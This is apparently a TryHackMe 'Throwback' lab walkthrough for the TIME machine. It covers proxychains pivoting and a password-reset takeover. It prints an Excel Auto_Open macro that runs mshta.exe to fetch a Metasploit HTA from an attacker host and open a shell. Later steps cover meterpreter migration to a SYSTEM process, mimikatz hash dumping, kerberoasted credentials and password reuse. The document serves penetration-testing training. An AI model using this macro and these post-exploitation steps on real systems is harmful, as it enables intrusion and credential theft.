# TryHackMe-THROWBACK-TIME(100.20.34.176)
Since we ran socks4 proxy on port 1080 we use nmap along with proxychains to see if we can hit a port on TIME machine
So we can access the web page
Going back to MAIL machine to get reset link by logging in as `MurhphyF`
murphyf
PASSWORD
Now we need to update our `/etc/hosts` file
We updated the password through the reset link and can login with those
Create a microsoft execl macro document having this macro in it using metasploit hta server
```
Sub HelloWorld()
PID = Shell("mshta.exe http://10.50.31.16:8000/j4KCBrR.hta")
End Sub
Sub Auto_Open()
HelloWorld
End Sub
```
Where that .hta is generated through metasploit
Upload that document
You will get a shell
By typing `sysinfo`
We can see that we are on a 64 bit windows architecture but on 32 bit merterpreter session so we need to migrate to a 64 bit process. Running command `ps` to check currently running processes
Here we need to identify the process which is running as `NT AUTHORITY\SYSTEM` also running as a 64 bit
So we see this statisfying our requirements
And now we are the highest privileged user also now our meterpeter session is on 64 bit architecture
We can now run commands like mimikatz , hashdump
We have successfully dumped the hashes of the accounts on this machine
Using proxychains we ssh with `Timekeeper's` credentials
Switch to directory where mysql.exe is
Using the password from the kerberoasted mysql service account
Save the list of usernames you found from `domain_users` database
We can utilize the same list of passwords we used to get access to Throwbacks mail